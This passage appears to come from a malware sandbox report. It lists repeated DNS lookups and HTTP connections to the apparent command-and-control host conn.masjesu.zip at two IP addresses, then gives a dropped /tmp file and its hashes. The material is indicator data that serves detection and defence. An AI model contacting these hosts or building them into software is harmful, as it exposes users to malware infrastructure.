| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
Files
/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |